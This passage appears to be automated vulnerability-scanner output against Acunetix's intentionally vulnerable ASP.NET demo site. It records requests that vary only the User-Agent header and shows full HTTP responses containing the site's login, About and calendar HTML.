</td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 364 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:07 GMT Content-Length: 14686
Response Body - size: 14,686 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Show / hide Request and Response
Request Header - size: 563 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:07 GMT Content-Length: 51615
Response Body - size: 51,615 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBa8A2YPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIHD2QWAmYPFgIfAwUHQ29tbWVudGQCCA9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCCQ9kFgJmDxYCHwE